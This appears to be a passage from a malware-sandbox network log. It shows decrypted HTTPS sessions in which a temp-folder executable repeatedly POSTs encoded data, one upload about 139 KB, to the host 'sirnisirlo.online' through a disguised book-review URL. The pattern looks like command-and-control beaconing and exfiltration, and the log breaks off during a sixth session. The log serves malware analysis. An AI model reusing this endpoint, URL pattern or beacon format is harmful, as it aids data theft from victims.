1	192.168.2.7	49191	188.114.97.3	443	2176	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:56:55 UTC	449	OUT	POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 53 Host: sirnisirlo.online
2024-11-14 18:56:55 UTC	53	OUT	Data Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 03 00 00 00 00 00 00 00 00 02 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2024-11-14 18:56:56 UTC	722	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 18:56:56 GMT Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h9N9mILsRFEHWHcEqBJAxrcu11sgpXKEz7X5xxLN2E7TaOjk14sMHgL9gt9XNHlRbuM5XMUwd2F7IoKLrJzu8tIc2CZhMdA3q7qLGIIwa0u51JYHU7cH9cuJ8AQiG2Lebjo31g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e29396b2d3ad77b-NRT alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=142480&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1138&delivery_rate=20327&cwnd=32&unsent_bytes=0&cid=087bc0915dd30d44&ts=923&x=0"
2024-11-14 18:56:56 UTC	24	IN	Data Raw: 31 32 0d 0a 00 00 00 00 00 00 00 00 02 00 00 00 fe ff ff ff 91 90 0d 0a Data Ascii: 12
2024-11-14 18:56:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49202	188.114.97.3	443	2176	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:56:56 UTC	450	OUT	POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 208 Host: sirnisirlo.online
2024-11-14 18:56:56 UTC	208	OUT	Data Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 08 00 00 00 8c 00 00 00 95 00 00 00 2b ca 03 02 1a 23 12 65 c2 05 99 86 00 00 00 00 00 00 00 00 81 00 00 00 95 65 81 01 49 60 48 00 00 00 00 00 00 00 00 31 00 00 00 95 65 81 01 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: +#eeI`H1e(((
2024-11-14 18:56:57 UTC	785	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:56:57 GMT Connection: close gm: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=93Jp1KLNmHB2hxMAvA6V5qXzGUptXVXfjSIINzzVz9DKN4fn6vydobqTRHy97DZ%2BhQ4Ejjl%2FEKD5EMKPRDy3LCWQ6GWKZJWLb2sIPVyFSvZQeATaxlnC4E%2B2sYJFPGdr%2BpgqHw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293974ab456aee-BUF alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=33123&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1294&delivery_rate=87058&cwnd=32&unsent_bytes=0&cid=338cb712809bfe91&ts=364&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49218	188.114.97.3	443	2176	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:57:00 UTC	453	OUT	POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 139141 Host: sirnisirlo.online
2024-11-14 18:57:00 UTC	15331	OUT	Data Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 08 00 00 00 8c 00 00 00 02 c9 01 00 02 ae a1 14 1a 23 12 65 c2 05 99 86 00 00 00 00 00 00 00 00 06 81 00 00 01 57 d0 0a c9 60 48 49 4c 60 48 53 a1 34 39 b7 b6 b2 ec 1c a1 1d 2e aa b9 b2 39 b9 2e 33 39 b7 37 3a 32 b2 b9 b5 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e aa b9 b2 39 10 22 b0 3a b0 c8 cc 60 48 d3 22 b2 33 b0 ba 36 3a ec 20 a1 1d 2e aa b9 b2 39 b9 2e 33 39 b7 37 3a 32 b2 b9 b5 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e aa b9 b2 39 10 22 b0 3a b0 2e 22 b2 33 b0 ba 36 3a ec 1a b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 2e a1 34 39 b7 b6 b2 2e 38 39 b7 33 b4 36 b2 b9 2e 22 b2 33 b0 ba 36 3a 2e 26 b7 Data Ascii: #eW`HIL`HS49.9.397:2.88":.&6.6.49.9":`H"36: .9.397:2.88":.&6.6.49.9":."36:49199.49.8936."36:.&
2024-11-14 18:57:00 UTC	15331	OUT	Data Raw: 13 d3 1c a0 82 45 19 1d ee df 72 64 55 f8 4f a1 5b 05 e0 1b 08 e9 3d ad ad b4 23 59 35 53 c0 35 32 2c 2d 46 aa 78 f8 bc 95 71 94 65 3b 72 4f 31 d6 8c 5b 56 64 2f d4 0e 0e 4d 1b 87 39 2c 05 55 6c b6 75 4b 49 f9 27 c2 e6 2b d1 42 08 36 c8 fe 86 c0 c0 cc 24 4b 22 0a 98 2f 33 86 7c 2a ed 87 63 1b 74 bd ba a4 ca 37 a4 ea 14 65 4b 13 f0 31 3d 36 6e 04 6d e0 fc 1b 73 fc 39 ef c8 d3 49 7b 88 95 f9 f0 32 80 51 ec c3 99 03 56 34 ea 65 58 58 b7 89 05 c7 3f 03 60 ed a5 3d cf 3f de 13 40 fb 16 db b7 c0 a5 1e 5b 87 08 96 44 c7 88 1f 94 e5 ab c4 52 69 cd 8a a1 4c f0 c9 fa 57 fe 02 20 8b 33 d1 d2 c3 7a ab 49 94 86 6a a1 63 43 21 fc dd 17 51 c7 de ee 22 ee 74 46 3f 8c 5b 0c f4 d3 8c eb fd 08 13 b8 ca f2 c6 d8 a4 88 79 88 14 58 dd 5f 68 fb 79 14 94 37 cc 1b 2e bc a4 93 c7 Data Ascii: ErdUO[=#Y5S52,-Fxqe;rO1[Vd/M9,UluKI'+B6$K"/3\|*ct7eK1=6nms9I{2QV4eXX?`=?@[DRiLW 3zIjcC!Q"tF?[yX_hy7.
2024-11-14 18:57:00 UTC	15331	OUT	Data Raw: d0 2b 5c 43 fc 42 f5 92 3e 34 89 b1 de 7b 4b a3 1c da 25 34 59 d6 db a2 af b8 a6 d0 a6 6f 4d ad 13 60 1e 8a 24 a2 4f f1 b0 d3 80 75 f9 71 5a 46 05 f2 43 fb 0b 5b 16 e5 8e 3b 3d 7c 96 5f 86 ab a7 1d 4b 9a b0 06 dd 10 35 d0 4d 25 bd 63 1e ba 7e 40 d3 05 16 00 23 64 3a 9d 53 30 65 80 8a 78 0a 0e 2a d0 71 5e 78 f6 19 d7 c5 2f 30 0a 6f 4f 6d e3 cf a1 0a da 13 2a f8 3d 23 99 56 24 30 02 42 b9 4c 32 50 2d db ed 50 ac 38 2d db bc a1 29 f8 a5 85 22 b5 4b f8 9d 04 94 5c 62 38 98 dc 37 f1 a9 33 e2 6b 96 87 3a 98 13 cf 85 8f a9 67 98 9f 10 0d d5 80 89 67 31 63 23 27 f6 61 60 23 d8 9a 81 1a 8c b2 11 06 30 72 33 d8 9c 15 14 50 2c 3f 30 d9 85 f7 18 50 4c 28 42 66 1c 19 f3 db bc 9e d3 84 04 1b 1b 69 05 4f 9a 09 64 37 01 a8 b9 8b 9f d4 08 12 2a 30 1e f1 24 b1 93 f1 d1 c0 Data Ascii: +\CB>4{K%4YoM`$OuqZFC[;=\|_K5M%c~@#d:S0exq^x/0oOm=#V$0BL2P-P8-)"K\b873k:gg1c#'a`#0r3P,?0PL(BfiOd7*0$
2024-11-14 18:57:00 UTC	15331	OUT	Data Raw: e3 c8 38 51 10 3a c1 11 76 a4 01 df 72 6e 46 13 c8 71 7e 26 61 7b 80 54 6b 01 68 26 09 9e 69 94 52 ae 37 2f 11 12 af c5 0a f3 bd 00 ce 5c 46 7a 10 2b 6b b4 ee 1b 0e 03 a6 f2 eb 45 46 b6 52 78 20 2e ae d3 ad 46 5c 65 af f3 95 8f f6 40 38 6d 2d 8b 44 ea 85 3c 6d 2c de ae 40 26 40 30 85 26 00 03 5b 60 84 31 fa 03 01 19 a8 c9 9f 20 13 24 58 82 7f df f1 de 77 94 01 f7 b1 83 a5 7d 2b 5e c1 3d 10 79 ca 22 76 33 5a 6c c8 b3 2b c9 cb e5 8b da 7f 8c 6d fc a9 b3 21 7a 52 1f 23 05 41 11 de 6a df b8 e4 96 a8 79 43 80 4c aa 0d cf 6b 2c 10 34 ab 53 63 18 f1 8a 36 f3 5a dd 23 bb 3e 68 31 c0 50 90 26 4c 05 2c 41 a1 bb a1 0b 9e 3f 5f 71 e3 88 09 da 61 33 ea 81 42 1e 83 60 53 c0 b6 49 57 ac 3b 82 8f c9 09 52 86 76 e8 ed e4 17 6d ff a1 d1 ff d0 98 1f 53 0e 9a ca 6d a6 83 c1 Data Ascii: 8Q:vrnFq~&a{Tkh&iR7/\Fz+kEFRx .F\e@8m-D<m,@&@0&[`1 $Xw}+^=y"v3Zl+m!zR#AjyCLk,4Sc6Z#>h1P&L,A?_qa3B`SIW;RvmSm
2024-11-14 18:57:00 UTC	15331	OUT	Data Raw: 49 d1 30 0e e2 0c 45 09 98 4c c0 88 88 b2 38 04 8b a8 0a 31 10 2b 60 a4 07 a1 a2 41 89 2c 42 0b 98 09 53 10 06 88 22 07 89 ff fd f1 f1 f9 91 e5 eb 3b 8d d3 8f fe 4c f2 8f ef ff 7b c8 3b bc 5e 7e 4c 4b 5e 2c bf 46 a1 4d ff 44 d3 d4 d5 f9 76 f1 fd 5b 76 fc f3 a3 de 7f 0c c3 c7 f7 a2 6e d6 bf 28 9f 49 f5 a3 4b 8b f8 6f b6 ff 51 fa 4d e3 a5 2d fe 0c c3 77 7d a7 b6 ff 7f fc c8 c6 be 2e 87 9f 71 3a d5 e3 b0 fe c8 47 a1 a8 cb 8f ef 9f 32 36 aa 4c 9f 7f 3a 4c 47 98 18 9a d3 32 06 37 cc 40 00 56 3a c9 91 ac 77 43 46 8f a4 c1 1c 8e 31 2a ae dd 4f ea 94 31 43 72 5f 0a e7 bf 9d 89 82 c5 d7 dc ca 80 70 23 72 f3 09 12 3d 9d 32 8a 07 b3 56 4e 62 38 08 30 1b bf 8f f7 8d 1c 00 cd 12 2f a6 9e de 92 32 e5 c2 bb 47 43 c9 af f3 52 a7 23 80 75 e7 f9 21 41 1c 7f 07 85 1b 1b 52 Data Ascii: I0EL81+`A,BS";L{;^~LK^,FMDv[vn(IKoQM-w}.q:G26L:LG27@V:wCF1*O1Cr_p#r=2VNb80/2GCR#u!AR
2024-11-14 18:57:00 UTC	15331	OUT	Data Raw: bc 46 60 4c bf f7 cb 04 46 53 3f fd 6d 66 d4 cf ed 71 2c d2 b6 2f 3a a1 ca cb af 25 a7 d3 52 4c 69 1d 67 65 5d a6 e3 75 af e2 bc af b0 61 df a9 9b 80 91 14 95 44 12 a7 51 1c 25 30 1c 22 88 04 c7 38 0c c7 b0 1a c0 79 12 01 98 06 82 d8 42 64 90 1e c2 e8 42 44 f1 1a e3 69 0e 16 79 01 85 fe fd 4c 84 7d 86 7d 86 7f f4 4c 63 13 f4 45 5c 34 7d 5d 37 c9 1b cf 43 b0 76 53 19 a4 55 5e d4 5d 5a 7f 1d 79 7e d9 a8 ff 95 85 fc cf e5 b2 76 c3 5a d6 53 59 74 f1 98 f7 55 16 f5 75 1e c4 c9 d4 26 5d 5f 8f 4d f4 af e6 71 bf 05 ec bc 0d 73 24 07 d1 84 80 f1 b4 c0 71 a2 4e 8a 0c 03 f2 a8 4a e3 38 c8 0b 22 4c 13 2c 26 52 14 45 c3 22 43 e1 90 c0 88 90 45 b1 3c 41 a2 34 7f 9f 6c 6f e7 50 fb f5 4b 94 95 4d 16 b6 4d 13 97 d3 5a 95 75 5d d5 d5 51 f6 d9 31 64 6d 90 ff cb b0 86 f8 8f Data Ascii: F`LFS?mfq,/:%RLige]uaDQ%0"8yBdBDiyL}}LcE\4}]7CvSU^]Zy~vZSYtUu&]_Mqs$qNJ8"L,&RE"CE<A4loPKMMZu]Q1dm
2024-11-14 18:57:00 UTC	15331	OUT	Data Raw: 7a 65 45 a8 f4 fb aa e8 e5 55 b6 34 84 f7 e1 19 5b ae 42 e9 02 4a 76 e7 d1 bf 60 0d 09 39 de 37 d5 d0 4d 8a 14 51 16 aa 91 91 34 02 df 13 1d 32 f4 ce 74 c5 61 87 58 06 08 f5 fc 23 04 d3 41 12 df 90 26 d8 b0 be 50 ac 5d 2d d0 8c 75 b6 88 f8 ac b2 03 c2 eb 92 3d 44 89 12 9e 90 69 72 b7 c7 62 19 56 38 60 3e bc 97 11 c9 68 31 87 bd ee 7b 27 f1 ae 06 b8 6c d1 6b 71 c8 1b 07 b1 f5 f3 27 ac 94 56 51 46 aa e8 96 19 48 a9 78 73 ed 1b 57 01 ac 5d 87 b5 26 79 22 1b ea 85 e9 61 39 53 04 be 45 d3 a9 49 1e 0a db 06 42 42 c0 26 36 9a 42 eb b2 cd b7 d1 8a 3d a6 f9 2e df af 64 e9 f0 e9 7a f2 fa b5 26 42 a0 d3 7c 21 00 d2 bc 17 a5 88 c2 7c b4 78 08 bd c0 41 e1 7c ea 91 c0 e3 c5 57 c5 91 1a 62 5c 4f d5 0c d4 e8 35 27 a5 03 cd e8 15 0a 07 48 26 93 92 3d b4 47 9e e3 9e 3b f4 Data Ascii: zeEU4[BJv`97MQ42taX#A&P]-u=DirbV8`>h1{'lkq'VQFHxsW]&y"a9SEIBB&6B=.dz&B\|!\|xA\|Wb\O5'H&=G;
2024-11-14 18:57:00 UTC	15331	OUT	Data Raw: 5d 3c 4c c4 44 85 77 b4 c5 f9 97 df bb e4 4b ed eb d7 a5 ef 0e f3 c2 2d 0e de 1c fb a5 d2 71 97 47 aa 1b ca 7f 5c 18 ae b7 d4 05 79 ac 3c f1 60 f9 e1 12 dd f3 b8 5d 9b cd 64 5b 4e 9a 46 d1 76 2f ae 73 4f 50 e4 16 97 c6 e3 84 ad 1e b9 77 12 52 18 a3 77 4b 49 a7 82 0e 93 6f 1c 05 f7 c7 e5 ac 2e 76 43 26 3c e1 4c e7 33 8b 1f 6e 20 4a d3 77 56 1e 2c 0f 0c 63 c8 ab 1f d8 96 c2 c3 fe 18 e5 f3 9e 7b 0c e6 22 9f 27 7b 0b 76 54 bd ec 35 5b f7 71 89 8d a3 4b 68 ae 98 24 85 e6 f0 18 f2 69 c0 b3 65 b6 46 d2 fb f7 cb 8d 60 b0 7f 7e f3 97 2b af 72 e1 6e c2 cb 9a 24 71 d0 e3 61 36 97 cf 9a bc a5 e4 71 71 93 17 23 1a e4 63 a3 a9 0e a7 09 89 c8 c6 c9 54 4c 09 c6 c3 5f 24 5e 1c 78 14 8f 87 07 d3 e5 6f 29 3c 1e 52 f0 32 1d f3 e1 3b 18 46 bc 0c 42 93 26 f1 0e 93 b0 9f 46 53 Data Ascii: ]<LDwK-qG\y<`]d[NFv/sOPwRwKIo.vC&<L3n JwV,c{"'{vT5[qKh$ieF`~+rn$qa6qq#cTL_$^xo)<R2;FB&FS
2024-11-14 18:57:00 UTC	15331	OUT	Data Raw: 46 4a c8 72 44 39 4c 13 80 11 9f 8e 20 8a e4 53 84 95 4d b5 66 0c 9a e4 7b 8f e4 76 9e 5e 82 b4 fc fe 62 e4 9e ab fe 08 be 9d d7 d7 3b 38 e5 b1 da 9b e5 8f 77 6d 3b fa 24 d5 a8 e0 1f a7 e6 89 d7 5f 7b dc bf 58 3b 35 ec 5c 36 c3 78 d8 ad fa 36 5b a8 f4 e0 b7 bc 8a b7 6e 73 28 bb c1 cb e3 ad 6e 6f 2f 5c b0 51 ee ba 57 ba eb 48 58 8e 96 53 0e ac af 68 e7 dd a7 db c9 e3 09 17 52 64 49 dc 79 fe 49 f6 69 de f3 59 65 23 66 f9 4a 16 c4 fa 75 a9 b3 9b a6 b1 ef 6f 7a d5 ee 81 dd e6 fa 0f ab fe 68 57 37 71 cb 5b b5 63 78 ce e7 b6 af dd 57 e5 55 4b b1 fc f6 53 75 ab 1e 3e 3a 6a c7 7a 44 94 18 6c f8 9e d6 76 5c de bb 6d 56 fa 4b b9 2b d5 d7 75 b6 2e 09 8a 1e 66 d4 6c 93 5c e7 1c a1 be eb 8e 5f 69 cf 1b b7 1d 9d b2 a0 24 65 99 a4 e3 91 6b e3 95 5b b2 e4 74 f6 c8 e9 1e Data Ascii: FJrD9L SMf{v^b;8wm;$_{X;5\6x6[ns(no/\QWHXShRdIyIiYe#fJuozhW7q[cxWUKSu>:jzDlv\mVK+u.fl\_i$ek[t
2024-11-14 18:57:00 UTC	1162	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-11-14 18:57:01 UTC	783	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:57:01 GMT Connection: close gm: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WZaxcSIdl7d8S40gm0aY70y1jaEKSZlH4Orb6vLBXVxZTCRTUlBfnfyKlKWyfZ3nUfAGTUCXUM3UoTKWCI7OiF9ANJ7gFG7lPA0lQLouzN2lyojf7pEuM8jmkIcUKz354A7Hqg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e29398bac77cf19-SJC alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=45094&sent=83&recv=148&lost=0&retrans=0&sent_bytes=2841&recv_bytes=140626&delivery_rate=64238&cwnd=32&unsent_bytes=0&cid=30a60ea50c1f6887&ts=1204&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49234	188.114.97.3	443	2176	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:57:03 UTC	450	OUT	POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 745 Host: sirnisirlo.online
2024-11-14 18:57:03 UTC	745	OUT	Data Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 08 00 00 00 8c 00 00 00 95 00 00 00 38 31 c7 22 1a 23 12 65 c2 05 99 86 00 00 00 00 00 00 00 00 81 00 00 00 1c 98 e3 11 49 60 48 00 00 00 00 00 00 00 00 31 00 00 00 1c 98 e3 11 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 08 00 00 00 8c 00 00 00 a7 00 00 00 0c cf 7f 22 1a 23 12 65 c2 05 99 86 00 00 00 00 00 00 00 00 8a 00 00 00 06 e7 bf 11 49 60 49 ca 60 01 80 d1 49 60 00 50 ca 60 80 80 d1 49 60 00 50 00 00 Data Ascii: 81"#eI`H1((("#eI`I`I`P`I`P
2024-11-14 18:57:03 UTC	781	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:57:03 GMT Connection: close gm: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hGXFu0pAsxamw42Di5xAt9vOtQWZTXb%2Fy%2B0F8qRKZsjV04IYjAJPUZnNgPmA4YZHb3kanKJm28Hq0u4c3xTLR27nZDaJODbudHfxf6KKsVIzs5heUnJwio3GMC5y8LWXzyb6sg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e29399cbbbf943b-SJC alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=40291&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1831&delivery_rate=71481&cwnd=32&unsent_bytes=0&cid=b874be4c3cde1651&ts=568&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49241	188.114.97.3	443	2176	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:57:05 UTC	450	OUT	POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 212 Host: sirnisirlo.online
2024-11-14 18:57:05 UTC	212	OUT	Data Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 08 00 00 00 8c 00 00 00 99 00 00 00 b7 8a c4 29 1a 23 12 65 c2 05 99 86 00 00 00 00 00 00 00 00 83 00 00 00 db 45 62 94 c9 60 60 49 60 c8 00 00 00 00 00 00 00 00 00 31 00 00 00 db 45 62 94 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: )#eEb``I`1Eb(((
2024-11-14 18:57:05 UTC	791	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:57:05 GMT Connection: close gm: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9aDFEvHZrNIdr%2BHHMFqhAsC4xQj%2FRB%2F4F3ooStosgHiru%2Fz8bmPeX156z5mhGYQaye6YZa3FfsfeG5upnyqbLSV5eUci%2FJUzafM8Sk3clWpdsZv9BrG%2B0lFwFF8QJDDDm43KBw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e2939a7eb32d74c-NRT alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=138903&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1298&delivery_rate=20821&cwnd=32&unsent_bytes=0&cid=c41660ede97af387&ts=1037&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49251	188.114.97.3	443	2176	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:57:07 UTC	450	OUT	POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 380 Host: sirnisirlo.online
